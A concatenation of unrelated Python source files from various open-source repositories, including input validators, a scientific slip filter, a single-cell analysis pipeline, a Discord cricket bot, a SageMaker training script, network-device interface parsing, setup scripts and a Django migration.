r"+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"
)
# Simple password regex, requires a minimum of 8 characters with at least one
# uppercase letter, one lowercase letter, and one number.
PASSWORD_REGEX = re.compile(r"^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,}$")
# Simple username regex, number of characters between 3-24, allowing only alphanumerics,
# dashes and underscores.
USERNAME_REGEX = re.compile(r"^[a-zA-Z0-9-_]{3,24}$")
def valid_email(email_string: str) -> bool:
return EMAIL_REGEX.match(email_string) is not None
def valid_password(password_string: str) -> bool:
return PASSWORD_REGEX.match(password_string) is not None
def valid_username(username_string: str) -> bool:
return USERNAME_REGEX.match(username_string) is not None
| 3.09375 | 3 |
tailseq/tools.py | hbc/tailseq-tool-daley | 1 | 12762212 | <filename>tailseq/tools.py
import os
def splitext_plus(f):
"""Split on file extensions, allowing for zipped extensions.
copy from bcbio
"""
base, ext = os.path.splitext(f)
if ext in [".gz", ".bz2", ".zip"]:
base, ext2 = os.path.splitext(base)
ext = ext2 + ext
return base, ext
| 2.625 | 3 |
atoman/filtering/filters/slipFilter.py | chrisdjscott/Atoman | 9 | 12762213 |
"""
Slip
====
Calculate slip within the lattice, on an atom by atom basis. This filter works by
comparing the displacement of an atom from its reference position, to the
equivalent displacements of neighbouring atoms from the reference lattice.
If an atom as moved in a different direction to one of its neighbours in the
reference then it has "slipped". Once slip is calculated you can filter atoms by
their slip value.
Parameters affecting this filter are:
.. glossary::
Neighbour cut-off
Atoms are said to have been neighbours in the reference lattice if their
separation was less than this value.
Slip tolerance
If the magnitude of the slip contribution between an atom and one of its
neighbours is less than this value we ignore it.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import numpy as np
from . import base
from . import _filtering
class SlipFilterSettings(base.BaseSettings):
"""
Settings for the slip filter
"""
def __init__(self):
super(SlipFilterSettings, self).__init__()
self.registerSetting("filteringEnabled", default=False)
self.registerSetting("minSlip", default=0.0)
self.registerSetting("maxSlip", default=9999.0)
self.registerSetting("neighbourCutOff", 3.0)
self.registerSetting("slipTolerance", default=0.3)
class SlipFilter(base.BaseFilter):
"""
Slip filter.
"""
def apply(self, filterInput, settings):
"""Apply the filter."""
# unpack inputs
inputState = filterInput.inputState
refState = filterInput.refState
NScalars = filterInput.NScalars
fullScalars = filterInput.fullScalars
NVectors = filterInput.NVectors
fullVectors = filterInput.fullVectors
visibleAtoms = filterInput.visibleAtoms
driftCompensation = filterInput.driftCompensation
driftVector = filterInput.driftVector
# settings
minSlip = settings.getSetting("minSlip")
maxSlip = settings.getSetting("maxSlip")
cutoff = settings.getSetting("neighbourCutOff")
tol = settings.getSetting("slipTolerance")
filteringEnabled = settings.getSetting("filteringEnabled")
# new scalars array
scalars = np.zeros(len(visibleAtoms), dtype=np.float64)
# call C library
NVisible = _filtering.slipFilter(visibleAtoms, scalars, inputState.pos, refState.pos, inputState.cellDims,
inputState.PBC, minSlip, maxSlip, NScalars, fullScalars, filteringEnabled,
driftCompensation, driftVector, NVectors, fullVectors, cutoff, tol)
# resize visible atoms and scalars
visibleAtoms.resize(NVisible, refcheck=False)
scalars.resize(NVisible, refcheck=False)
# make result and add scalars
result = base.FilterResult()
result.addScalars("Slip", scalars)
return result
| 2.953125 | 3 |
scale/function.py | QingZhan98/SCALE_v2 | 1 | 12762214 | #!/usr/bin/env python
"""
# Author: <NAME>
# Created Time : Tue 29 Sep 2020 01:41:23 PM CST
# File Name: function.py
# Description:
"""
import torch
import numpy as np
import os
import scanpy as sc
from anndata import AnnData
from .data import load_data
from .net.vae import VAE
from .net.utils import EarlyStopping
from .metrics import batch_entropy_mixing_score, silhouette_score
from .logger import create_logger
from .plot import embedding
def SCALE(
data_list,
batch_categories=None,
profile='RNA',
join='inner',
batch_key='batch',
batch_name='batch',
min_features=600,
min_cells=3,
n_top_features=2000,
batch_size=64,
lr=2e-4,
max_iteration=30000,
seed=124,
gpu=0,
outdir='output/',
projection=None,
repeat=False,
impute=None,
chunk_size=20000,
ignore_umap=False,
verbose=False,
assess=False,
show=True,
):
"""
Single-Cell integrative Analysis via Latent feature Extraction
Parameters
----------
data_list
A path list of AnnData matrices to concatenate with. Each matrix is referred to as a 'batch'.
batch_categories
Categories for the batch annotation. By default, use increasing numbers.
profile
Specify the single-cell profile, RNA or ATAC. Default: RNA.
join
Use intersection ('inner') or union ('outer') of variables of different batches.
batch_key
Add the batch annotation to obs using this key. By default, batch_key='batch'.
batch_name
Use this annotation in obs as batches for training model. Default: 'batch'.
min_features
Filtered out cells that are detected in less than min_features. Default: 600.
min_cells
Filtered out genes that are detected in less than min_cells. Default: 3.
n_top_features
Number of highly-variable genes to keep. Default: 2000.
batch_size
Number of samples per batch to load. Default: 64.
lr
Learning rate. Default: 2e-4.
max_iteration
Max iterations for training. Training one batch_size samples is one iteration. Default: 30000.
seed
Random seed for torch and numpy. Default: 124.
gpu
Index of GPU to use if GPU is available. Default: 0.
outdir
Output directory. Default: 'output/'.
projection
Use for new dataset projection. Input the folder containing the pre-trained model. If None, don't do projection. Default: None.
repeat
Use with projection. If False, concatenate the reference and projection datasets for downstream analysis. If True, only use projection datasets. Default: False.
impute
If True, calculate the imputed gene expression and store it at adata.layers['impute']. Default: False.
chunk_size
Number of samples from the same batch to transform. Default: 20000.
ignore_umap
If True, do not perform UMAP for visualization and leiden for clustering. Default: False.
verbose
Verbosity, True or False. Default: False.
assess
If True, calculate the entropy_batch_mixing score and silhouette score to evaluate integration results. Default: False.
Returns
-------
The output folder contains:
adata.h5ad
The AnnData matrice after batch effects removal. The low-dimensional representation of the data is stored at adata.obsm['latent'].
checkpoint
model.pt contains the variables of the model and config.pt contains the parameters of the model.
log.txt
Records raw data information, filter conditions, model parameters etc.
umap.pdf
UMAP plot for visualization.
"""
np.random.seed(seed) # seed
torch.manual_seed(seed)
if torch.cuda.is_available(): # cuda device
device='cuda'
torch.cuda.set_device(gpu)
else:
device='cpu'
outdir = outdir+'/'
os.makedirs(outdir+'/checkpoint', exist_ok=True)
log = create_logger('', fh=outdir+'log.txt')
if not projection:
adata, trainloader, testloader = load_data(
data_list, batch_categories,
join=join,
profile=profile,
n_top_features=n_top_features,
batch_size=batch_size,
chunk_size=chunk_size,
min_features=min_features,
min_cells=min_cells,
batch_name=batch_name,
batch_key=batch_key,
log=log
)
early_stopping = EarlyStopping(patience=10, checkpoint_file=outdir+'/checkpoint/model.pt')
x_dim, n_domain = adata.shape[1], len(adata.obs['batch'].cat.categories)
# model config
enc = [['fc', 1024, 1, 'relu'],['fc', 10, '', '']] # TO DO
dec = [['fc', x_dim, n_domain, 'sigmoid']]
model = VAE(enc, dec, n_domain=n_domain)
log.info('model\n'+model.__repr__())
model.fit(
trainloader,
lr=lr,
max_iteration=max_iteration,
device=device,
early_stopping=early_stopping,
verbose=verbose,
)
torch.save({'n_top_features':adata.var.index, 'enc':enc, 'dec':dec, 'n_domain':n_domain}, outdir+'/checkpoint/config.pt')
else:
state = torch.load(projection+'/checkpoint/config.pt')
n_top_features, enc, dec, n_domain = state['n_top_features'], state['enc'], state['dec'], state['n_domain']
model = VAE(enc, dec, n_domain=n_domain)
model.load_model(projection+'/checkpoint/model.pt')
model.to(device)
adata, trainloader, testloader = load_data(
data_list, batch_categories,
join='outer',
profile=profile,
chunk_size=chunk_size,
n_top_features=n_top_features,
min_cells=0,
min_features=min_features,
batch_name=batch_name,
batch_key=batch_key,
log = log
)
# log.info('Processed dataset shape: {}'.format(adata.shape))
adata.obsm['latent'] = model.encodeBatch(testloader, device=device) # save latent rep
if impute:
adata.layers['impute'] = model.encodeBatch(testloader, out='impute', batch_id=impute, device=device)
log.info('Output dir: {}'.format(outdir))
if projection and (not repeat):
ref = sc.read_h5ad(projection+'/adata.h5ad')
adata = AnnData.concatenate(
ref, adata,
batch_categories=['reference', 'query'],
batch_key='projection',
index_unique=None
)
adata.write(outdir+'adata.h5ad', compression='gzip')
if not ignore_umap: #and adata.shape[0]<1e6:
log.info('Plot umap')
sc.pp.neighbors(adata, n_neighbors=30, use_rep='latent')
sc.tl.umap(adata, min_dist=0.1)
sc.tl.leiden(adata)
# UMAP visualization
sc.settings.figdir = outdir
sc.set_figure_params(dpi=80, figsize=(10,10), fontsize=20)
cols = ['batch', 'celltype', 'leiden']
color = [c for c in cols if c in adata.obs]
if len(color) > 0:
if projection and (not repeat):
embedding(adata, groupby='projection', save='.pdf', show=show)
else:
sc.pl.umap(adata, color=color, save='.pdf', wspace=0.4, ncols=4, show=show)
if assess:
if len(adata.obs['batch'].cat.categories) > 1:
entropy_score = batch_entropy_mixing_score(adata.obsm['X_umap'], adata.obs['batch'])
log.info('batch_entropy_mixing_score: {:.3f}'.format(entropy_score))
if 'celltype' in adata.obs:
sil_score = silhouette_score(adata.obsm['X_umap'], adata.obs['celltype'].cat.codes)
log.info("silhouette_score: {:.3f}".format(sil_score))
adata.write(outdir+'adata.h5ad', compression='gzip')
return adata
def label_transfer(ref, query, rep='latent', label='celltype'):
"""
Label transfer
Parameters
-----------
ref
reference containing the projected representations and labels
query
query data to transfer label
rep
representations to train the classifier. Default is `latent`
label
label name. Defautl is `celltype` stored in ref.obs
Returns
--------
transfered label
"""
from sklearn.neighbors import KNeighborsClassifier
X_train = ref.obsm[rep]
y_train = ref.obs[label]
X_test = query.obsm[rep]
knn = knn = KNeighborsClassifier().fit(X_train, y_train)
y_test = knn.predict(X_test)
return y_test
| 2.21875 | 2 |
vyperlogix/products/responses.py | raychorn/chrome_gui | 1 | 12762215 | from vyperlogix.hash import lists
code_error = -404
code_noUpdate = -100
code_isUpdate = 400
code_revoked = -500
code_updated = 100
code_accepted = 200
code_valid = 300
code_invalid = -301
_info_site_address = 'www.VyperLogix.com'
d_responses = lists.HashedLists2({code_error:'Warning: Unable to process your Registration.',
code_invalid:'Your registration is not valid. Please make sure your payment has processed.',
code_noUpdate:'You have the latest version.',
code_revoked:'Your product key has been revoked. You may Register again to regain access.',
code_updated:'Your registration has been updated and will be processed as quickly as possible.',
code_accepted:'Your registration has been accepted; you should receive your Product Key shortly.',
code_valid:'Your Product ID has been accepted; enjoy the power.',
code_isUpdate:'There is a new version available you can download from %s.' % (_info_site_address)
})
| 2.125 | 2 |
renderoo/component.py | yelluw/renderoo | 0 | 12762216 | <reponame>yelluw/renderoo
class Component:
def render(self):
raise NotImplementedError
| 1.421875 | 1 |
bot/cogs/ipl/ipl.py | Qtopia-Team/luci | 5 | 12762217 | <gh_stars>1-10
import discord
from discord.ext import commands
import aiohttp
from datetime import date, timedelta
import os
import psycopg2
class IPL(commands.Cog):
"""Get info about today's as well as last match in IPL. See current score and play Sattebaaz Championship"""
def __init__(self, bot):
self.bot = bot
# Initialize a client session
self.session = aiohttp.ClientSession()
self.api_matches = "https://cricapi.com/api/matches?"
self.api_score = "https://cricapi.com/api/cricketScore?"
self.apikey = os.getenv("CRIC_API_KEY")
# Initialize Connection to database
DATABASE_URL = os.environ['DATABASE_URL']
self.dbcon = psycopg2.connect(DATABASE_URL, sslmode = "require")
self.cursor = self.dbcon.cursor()
# Create tables
query = """CREATE TABLE IF NOT EXISTS predict
(embed_id BIGINT NOT NULL)"""
self.cursor.execute(query)
self.dbcon.commit()
query = """CREATE TABLE IF NOT EXISTS standings(
user_id BIGINT NOT NULL,
points INT NOT NULL)"""
self.cursor.execute(query)
self.dbcon.commit()
# Links for image url of all the teams and the ipl logo
self.image_url = {
"Kolkata Knight Riders": "https://hdsportsnews.com/wp-content/uploads/2020/01/kolkata-knight-riders-kkr-2020-team-squad-players-live-score-time-table-point-table-schedule-auction-match-fixture-venue-highlight-1280x720.jpg",
"Rajasthan Royals": "https://cdn5.newsnationtv.com/images/2021/02/22/royal-rajasthan-logo-70.jpg",
"Royal Challengers Bangalore": "https://english.sakshi.com/sites/default/files/article_images/2020/11/8/RCB-Logo_571_855-1604821493.jpg",
"Mumbai Indians": "https://static.india.com/wp-content/uploads/2017/03/mumbai.jpg?impolicy=Medium_Resize&w=1200&h=800",
"Punjab Kings": "https://awaj.in/wp-content/uploads/2021/03/20210317_222651.jpg",
"Sunrisers Hyderabad": "https://2.bp.blogspot.com/-6cAZUQMFCqc/WwKFUZrPPmI/AAAAAAAACcM/TryzryihpEkoOMd6htpE8LjIH1r02FWSgCLcBGAs/s1600/SRH.jpg",
"Chennai Super Kings": "https://i.pinimg.com/originals/85/52/f8/8552f811e95b998d9505c43a9828c6d6.jpg",
"Delhi Capitals": "https://d3pc1xvrcw35tl.cloudfront.net/ln/images/686x514/teamsinnerintrodc534x432-resize-534x432-a7542dd51f-d979030f10e79596_202009106828.jpeg"
}
self.ipl_logo = "https://img.etimg.com/thumb/width-1200,height-900,imgsize-121113,resizemode-1,msid-81376248/ipl-2021-from-april-9-six-venues-no-home-games-no-spectators.jpg"
# Update details of last match and upcoming match
async def fetch_matches(self):
# Fetch matches from website
params = {"apikey": self.apikey}
async with self.session.get(self.api_matches, params = params) as response:
data = await response.json()
# Details about the last match
last_match = []
# Details about the todays match
next_match = []
for match in data["matches"]:
# If last match id is similar to IPL matches' ID and date was yesterday
# then add the match to last match list
if (str(match["unique_id"])[:-2] == "12540"\
and match["date"][:10] == str(date.today() - timedelta(days = 1))):
# date.today() - timedelta(days = 1) yields yesterday's date
last_match.append(match)
# If date is todays date
if (str(match["unique_id"])[:-2] == "12540"\
and match["date"][:10] == str(date.today())):
next_match.append(match)
# On normal days, there should be only one last match and second match should be False
last_match_details = last_match[0]
last_match_details_2 = False
# However when there were two matches yesterday, add it to last match details 2
if (len(last_match) > 1):
last_match_details_2 = last_match[1]
# Invert the last match and second last match
last_match_details, last_match_details_2 = last_match_details_2, last_match_details
# Similarly make details of next match also
next_match_details = next_match[0]
next_match_details_2 = False
if (len(next_match) > 1):
next_match_details_2 = next_match[1]
# Invert again
next_match_details, next_match_details_2 = next_match_details_2, next_match_details
# Return the details
return (last_match_details, last_match_details_2, next_match_details, next_match_details_2)
@commands.command()
async def ipl(self, ctx):
"""Get info about last match and upcoming matches"""
# Fetch details first
last_match_details, last_match_details_2, \
next_match_details, next_match_details_2 = self.fetch_matches()
embed = discord.Embed(
color = 0x25dbf4, # Blue
title = "Matches"
)
embed.add_field(
name = "Next Match",
value = f'{next_match_details["team-1"]} \nvs \
\n{next_match_details["team-2"]}',
inline = False
)
# If there is a second match on that day
if (next_match_details_2 != False):
embed.add_field(
name = "Match 2",
value = f'{next_match_details_2["team-1"]} \nvs \
\n{next_match_details_2["team-2"]}',
inline = False
)
embed.add_field(
name = "Last Match",
value = f'{last_match_details["team-1"]} \nvs \n{last_match_details["team-2"]}',
inline = True
)
embed.add_field(
name = "Winner",
value = f'{last_match_details["winner_team"]}',
inline = True
)
image_url = self.image_url[last_match_details["winner_team"]]
# If there was another match yesterday
if (last_match_details_2 != False):
embed.add_field(
name = "Match 2",
value = f'{last_match_details_2["team-1"]} \nvs \
\n{last_match_details_2["team-2"]}',
inline = False
)
embed.add_field(
name = "Winner",
value = f'{last_match_details_2["winner_team"]}',
inline = True
)
# Update the image to show
image_url = self.image_url[last_match_details_2["winner_team"]]
embed.set_image(url = image_url)
embed.set_thumbnail(url = self.ipl_logo)
await ctx.send(embed = embed)
async def fetch_score(self, match_details):
# Set up params
params = {"apikey": self.apikey, "unique_id": match_details["unique_id"]}
async with self.session.get(self.api_score, params = params) as response:
data = await response.json()
# If the First Match too hasn't started
if (data["matchStarted"] == False):
# Send a cute dog image/gif
dog_api = "https://api.thedogapi.com/v1/images/search"
async with self.session.get(dog_api) as response:
response_dog = await response.json()
response_dog = response_dog[0]
embed = discord.Embed(
title = "Bruh...",
color = 0xea1010 # Red
)
embed.add_field(
name = "The match has not even started yet 🤦♂️",
value = "Wait till the match starts? Anyway here is a cute doggo ❤"
)
embed.set_image(url = response_dog["url"])
return embed
# Differentiate between the first team and the second team
index_v = data["score"].find("v")
if (data["score"][-1] != "*"):
current_batting = data["team-1"]
else:
current_batting = data["team-2"]
embed = discord.Embed(
title = "Live Score",
color = 0x25dbf4, # Blue
)
embed.add_field(
name = "Team A",
value = data["score"][:index_v],
inline = False
)
embed.add_field(
name = "Team B",
value = data["score"][index_v + 1:],
inline = False
)
embed.set_image(url = self.image_url[current_batting])
embed.set_thumbnail(url = self.ipl_logo)
return embed
@commands.command()
async def score(self, ctx):
"""See live score"""
await ctx.trigger_typing()
*_, next_match_details, next_match_details_2 = await self.fetch_matches()
# Check if there is second match
if (next_match_details_2 != False):
# If the second match has indeed started
if (next_match_details_2["matchStarted"] != False):
match_details = next_match_details_2
# Else in all other cases go with the first match of the day
else:
match_details = next_match_details
embed = await self.fetch_score(match_details)
await ctx.send(embed = embed)
async def fetch_standings(self):
# Fetch standings from the database
self.cursor.execute("SELECT * FROM STANDINGS ORDER BY points DESC")
data = self.cursor.fetchall()
current_standings = {}
for user in data:
# user = (user, points)
# Fetch username
user_info = self.bot.get_user(user[0])
username = user_info.name
# Make a dictionary of the form
# {username: points}
current_standings[username] = user[1]
leaderboard = [user for user in current_standings]
embed = discord.Embed(
title = "Current Standings",
color = 0x07f223
)
embed.set_thumbnail(url = self.ipl_logo)
emojies = ["🥇", "🥈", "🥉", "4️⃣", "5️⃣", "6️⃣", "7️⃣", "8️⃣", "9️⃣", "🔟"]
# Add fields to the embed
for index in range(len(leaderboard)):
embed.add_field(
name = f"{emojies[index]} {leaderboard[index]}",
value = f"Points: {current_standings[leaderboard[index]]}",
inline = False
)
return embed
@commands.command()
async def standings(self, ctx):
"""Get current standings of Sattebaaz Championship"""
embed = await self.fetch_standings()
await ctx.send(embed = embed)
# Following are all owner only command
async def predict_code(self, match_details):
# Set Channel
channel = self.bot.get_channel(756701639544668160)
embed = discord.Embed(
color = 0x19f0e2, # Cyan
title = "Sattebaaz Championship",
)
embed.add_field(
name = "Who do you think will win today's match?",
value = f':regional_indicator_a: {match_details["team-1"]}\n:regional_indicator_b: {match_details["team-2"]}'
)
embed.set_thumbnail(url = self.ipl_logo)
last_embed = await channel.send(embed = embed)
await last_embed.add_reaction("🇦")
await last_embed.add_reaction("🇧")
return (last_embed.id)
@commands.is_owner()
@commands.command(hidden = True)
async def predict(self, ctx):
*_, next_match_details, next_match_details_2 = await self.fetch_matches()
channel = self.bot.get_channel(756701639544668160)
allowed_mentions = discord.AllowedMentions(everyone = True)
await channel.send(content = "@everyone", allowed_mentions = allowed_mentions)
embed_id = await self.predict_code(next_match_details)
# Update database
self.cursor.execute("DELETE FROM predict")
query = """INSERT INTO predict VALUES
({})""".format(embed_id)
self.cursor.execute(query)
self.dbcon.commit()
# If there is a second match on that day
if (next_match_details_2 != False):
embed_id = await self.predict_code(next_match_details_2)
# Update database
query = """INSERT INTO predict VALUES
({})""".format(embed_id)
self.cursor.execute(query)
self.dbcon.commit()
async def update_points(self, match_details, embed_id):
# Get members details
self.cursor.execute("SELECT * FROM standings")
users = self.cursor.fetchall()
# Get user ids of all members who has selected each team
channel = self.bot.get_channel(756701639544668160)
last_embed = await channel.fetch_message(embed_id)
team_1 = []
team_2 = []
for reaction in last_embed.reactions:
async for user in reaction.users():
if (reaction.emoji == "🇦" and not user.bot):
team_1.append(user.id)
elif (reaction.emoji == "🇧" and not user.bot):
team_2.append(user.id)
# Get winners
if (match_details["winner_team"] == match_details["team-1"]):
winners = team_1
else:
winners = team_2
# Update points
for i in range(len(users)):
user = users[i]
if (user[0] in winners):
# First convert tuple into list
user = list(user)
user[1] += 10
# Update main list
users[i] = tuple(user)
# Update database
self.cursor.execute("DELETE FROM standings")
self.dbcon.commit()
for user in users:
self.cursor.execute("INSERT INTO standings VALUES {}".format(user))
self.dbcon.commit()
return winners
async def show_points(self):
# Get last match's details
last_match_details, last_match_details_2, *_ = await self.fetch_matches()
# Get last embed id
self.cursor.execute("SELECT * FROM predict")
data = self.cursor.fetchall()
embed_id = data[0][0]
winners = await self.update_points(last_match_details, embed_id)
for i in range(len(winners)):
user = self.bot.get_user(winners[i])
winners[i] = user
# If there was another match yesterday
if (last_match_details_2 != False):
embed_id = data[1][0]
second_winners = await self.update_points(last_match_details_2, embed_id)
embed = discord.Embed(
color = 0x07f223, # Green
title = "Sattebaaz Championship",
)
embed.add_field(
name = "Last match was won by ...",
value = last_match_details["winner_team"],
inline = True
)
embed.add_field(
name = "Winning sattebaaz",
value = "`{}`".format("\n".join((winner.name + "#" + winner.discriminator)\
for winner in winners)),
inline = False
)
# Add another field if there was another match yesterday
if (last_match_details_2 != False):
embed.add_field(
name = "Second match was won by ...",
value = last_match_details_2["winner_team"],
inline = True
)
embed.add_field(
name = "Winning sattebaaz",
value = "`{}`".format("\n".join((winner.name + "#" + winner.discriminator)\
for winner in winners)),
inline = False
)
embed.set_image(url = self.image_url[last_match_details["winner_team"]])
embed.set_thumbnail(url = self.ipl_logo)
return embed
@commands.is_owner()
@commands.command(hidden = True)
async def points(self, ctx):
"""Update points and show winners of last prediction(s)"""
embed = await self.show_points()
await ctx.send(embed = embed) | 2.671875 | 3 |
training/script.py | aws-samples/sagemaker-processing-reading-data-from-redshift-to-sagemaker-pipelines | 1 | 12762218 | <reponame>aws-samples/sagemaker-processing-reading-data-from-redshift-to-sagemaker-pipelines
import argparse
import joblib
import os
import pandas as pd
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error as mse
#### USED FOR PREDICTION ####
def model_fn(model_dir):
return joblib.load(os.path.join(model_dir, 'model.joblib'))
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--train_path', type=str, default='/opt/ml/input/data/train/')
parser.add_argument('--train_file', type=str, default='train.csv')
parser.add_argument('--test_path', type=str, default='/opt/ml/input/data/test/')
parser.add_argument('--test_file', type=str, default='test.csv')
parser.add_argument('--output_path', type=str, default='/opt/ml/model/')
args = parser.parse_args()
# Load the files
print("Loading the files ...")
train = pd.read_csv(os.path.join(args.train_path, args.train_file))
test = pd.read_csv(os.path.join(args.test_path, args.test_file))
X_train, y_train = train.drop('total_sold', axis=1), train.total_sold
X_test, y_test = test.drop('total_sold', axis=1), test.total_sold
# Train the model
print("Training the model ...")
rfr = RandomForestRegressor()
rfr.fit(X_train, y_train)
# Evaluate performance
print("Evaluating performances ... ")
score = mse(y_test, rfr.predict(X_test))
print(f"MSE: {score}")
# Save the model
print("Saving the model ...")
joblib.dump(rfr, os.path.join(args.output_path, 'model.joblib'))
| 2.6875 | 3 |
sa/profiles/HP/ProCurve/get_interfaces.py | prorevizor/noc | 84 | 12762219 | <filename>sa/profiles/HP/ProCurve/get_interfaces.py
# ---------------------------------------------------------------------
# HP.ProCurve.get_interfaces
# ---------------------------------------------------------------------
# Copyright (C) 2007-2016 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinterfaces import IGetInterfaces
from noc.core.ip import IPv4
class Script(BaseScript):
name = "HP.ProCurve.get_interfaces"
interface = IGetInterfaces
iftypes = {
"6": "physical",
"161": "aggregated",
"54": "aggregated",
"53": "SVI",
"24": "loopback",
}
objstr = {
"ifName": "name",
"ifDescr": "description",
"ifPhysAddress": "mac",
"ifType": "type",
"ifAdminStatus": "admin_status",
"ifOperStatus": "oper_status",
}
rx_ip = re.compile(
r"\s+(?P<name>\S+)\s+\|\s+(Manual|Disabled)\s"
r"+(?P<ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s"
r"+(?P<mask>\d{1,3}.\d{1,3}\.\d{1,3}\.\d{1,3})"
)
def execute(self):
iface = {}
interfaces = []
step = len(self.objstr)
lines = self.cli("walkMIB " + " ".join(self.objstr)).split("\n")[:-1]
sh_ip = self.cli("show ip")
try:
sh_ospf = self.cli("show ip ospf interface")
except Exception:
sh_ospf = False
portchannel_members = {} # member -> (portchannel, type)
for pc in self.scripts.get_portchannel():
i = pc["interface"]
t = pc["type"] == "L"
for m in pc["members"]:
portchannel_members[m] = (i, t)
switchports = {}
vlans = self.scripts.get_vlans()
if vlans:
for sp in self.scripts.get_switchport():
switchports[sp["interface"]] = (
sp["untagged"] if "untagged" in sp else None,
sp["tagged"],
)
i = 0
for s in range(int(len(lines) / step)):
for str in lines[i : i + step]:
leaf = str.split(".")[0]
val = str.split("=")[1].lstrip()
if leaf == "ifPhysAddress":
if not val:
continue
iface[self.objstr[leaf]] = val.rstrip().replace(" ", ":")
elif leaf == "ifType":
iface[self.objstr[leaf]] = self.iftypes[val]
elif leaf[-6:] == "Status":
iface[self.objstr[leaf]] = val == "1"
else:
iface[self.objstr[leaf]] = val
ifname = iface["name"]
sub = iface.copy()
ifindex = str.split("=")[0].split(".")[1].rstrip()
iface["snmp_ifindex"] = int(ifindex)
sub["snmp_ifindex"] = int(ifindex)
sub["enabled_afi"] = []
del sub["type"]
for l in sh_ip.split("\n"):
match = self.rx_ip.search(l)
if match:
if match.group("name") == sub["name"]:
sub["enabled_afi"] += ["IPv4"]
sub["ipv4_addresses"] = [
IPv4(match.group("ip"), netmask=match.group("mask")).prefix
]
if sh_ospf:
for o in sh_ospf.split("\n"):
if o.split():
if o.split()[0] == match.group("ip"):
sub["is_ospf"] = True
if ifname in switchports and ifname not in portchannel_members:
sub["enabled_afi"] += ["BRIDGE"]
u, t = switchports[ifname]
if u:
sub["untagged_vlan"] = u
if t:
sub["tagged_vlans"] = t
iface["subinterfaces"] = [sub]
interfaces += [iface]
iface = {}
i = i + step
return [{"interfaces": interfaces}]
| 1.96875 | 2 |
setup.py | mediawiki-utilities/python-mwevents | 1 | 12762220 | import os
from distutils.core import setup
from setuptools import find_packages, setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def requirements(fname):
for line in open(os.path.join(os.path.dirname(__file__), fname)):
yield line.strip()
setup(
name='mwevents',
version=read('VERSION').strip(),
author='<NAME>',
author_email='<EMAIL>',
packages=find_packages(),
scripts=[],
url='http://pypi.python.org/pypi/mwevents',
license=open('LICENSE').read(),
description='Standardized public MediaWiki events for tools and Science.',
long_description=read('README.rst'),
install_requires=[
'phpserialize',
'mediawiki-utilities',
'jsonable'
],
test_suite='nose.collector',
classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Environment :: Other Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Text Processing :: General",
"Topic :: Utilities",
"Topic :: Scientific/Engineering"
],
)
| 1.539063 | 2 |
stream/migrations/0003_auto_20201025_1206.py | WarwickAnimeSoc/aniMango | 0 | 12762221 | # Generated by Django 2.2.13 on 2020-10-25 12:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stream', '0002_viewcounter_name'),
]
operations = [
migrations.AlterField(
model_name='view',
name='token',
field=models.CharField(max_length=20, unique=True),
),
]
| 1.523438 | 2 |
tools/convert_datasets/rain_filtering_labels.py | kencan7749/mmsegmentation | 0 | 12762222 | <filename>tools/convert_datasets/rain_filtering_labels.py
import mmcv
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
from PIL import Image
from tqdm import tqdm
def create_mmseg_labels(label_root_dir, label_list,image_list,save_root_dir):
"""
Created and save labels for mmsegmentation.
Loaded label images (ranged 0-255) then regenerate labels accorging to their values (ranged 0 -num_classes -1).
For rain_filtering dataset,
0... none (both the first and last sensor are 0)
1... First_Sensor (only the first sensor is 1)
2... Last_Sensor (only the last sensor is 1)
3... Both_Sensors (Both the first and last sensors are 1)
The label images are saved as png file as 'P' mode.
Arguments:
label_root_dir: path to directory that contains the label image direcotry
label_list: list that contatins which label directory to use for labels
image_list; list that contains which image file to create labels
save_root_dir: path to directory that save directory
"""
for img_file in tqdm(image_list):
#load each images
label_image = create_label(label_root_dir, label_list, img_file)
#convert to PIL.Image
label_pil = Image.fromarray(label_image.astype(np.uint8))
#save label image
label_pil.save(os.path.join(save_root_dir, img_file), mode='P')
print('done')
def create_label(label_root_dir, label_list, img_file):
"""
Created and labels for mmsegmentation.
Loaded label images (ranged 0-255) then regenerate labels accorging to their values (ranged 0 -num_classes -1).
Arguments:
label_root_dir: path to directory that contains the label image direcotry
label_list: list that contatins which label directory to use for labels
img_file: str for load image file name
Return:
img_array: np.array: image shape, whose values are ranged (ranged 0 -num_classes -1).
For rain_filtering datasets,
0... none (both the first and last sensor are 0)
1... First_Sensor (only the first sensor is 1)
2... Last_Sensor (only the last sensor is 1)
3... Both_Sensors (Both the first and last sensors are 1)
The label images are saved as png file as 'P' mode.
"""
lbl_img_list = []
for label in label_list:
#load image as float32
lbl_img = mmcv.imread(os.path.join(label_root_dir, label, img_file)).astype(np.float32)
#convert 255-> 1 (Note that pixel values are eigher 0 or 255)
lbl_img /= 255
# sum up the channel e.g. (height, width, 3) -> (height, width)
lbl_img = lbl_img.sum(2)
#convert3 -> 1
lbl_img /=3
#append to list
lbl_img_list.append(lbl_img)
#regenerate lbl_img
img_array = np.zeros_like(lbl_img)
for i, img in enumerate(lbl_img_list):
img_array += img * (i+1)
return img_array
if __name__ == '__main__':
#plaser refactor accoridnt to the path
# args will be better
label_root_dir = '/var/datasets/rain_filtering/particle_labels/train'
save_root_dir = '/var/datasets/rain_filtering/ann_dir/train'
os.makedirs(save_root_dir, exist_ok=True)
#sensor type
label_list = ['first', 'last']
image_list= np.sort(os.listdir(os.path.join(label_root_dir, label_list[0])))
create_mmseg_labels(label_root_dir, label_list, image_list, save_root_dir)
| 3.09375 | 3 |
tests/base/test_transformsNd.py | mfkenson/spatialmath-python | 1 | 12762223 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 14:19:04 2020
@author: corkep
"""
import numpy as np
import numpy.testing as nt
import unittest
from math import pi
import math
from scipy.linalg import logm, expm
